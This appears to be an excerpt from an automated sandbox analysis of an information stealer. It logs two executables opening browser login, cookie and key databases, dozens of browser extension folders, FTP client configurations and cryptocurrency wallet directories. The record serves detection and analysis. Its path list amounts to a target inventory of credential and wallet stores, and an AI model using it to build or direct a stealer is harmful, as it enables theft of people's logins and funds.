Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
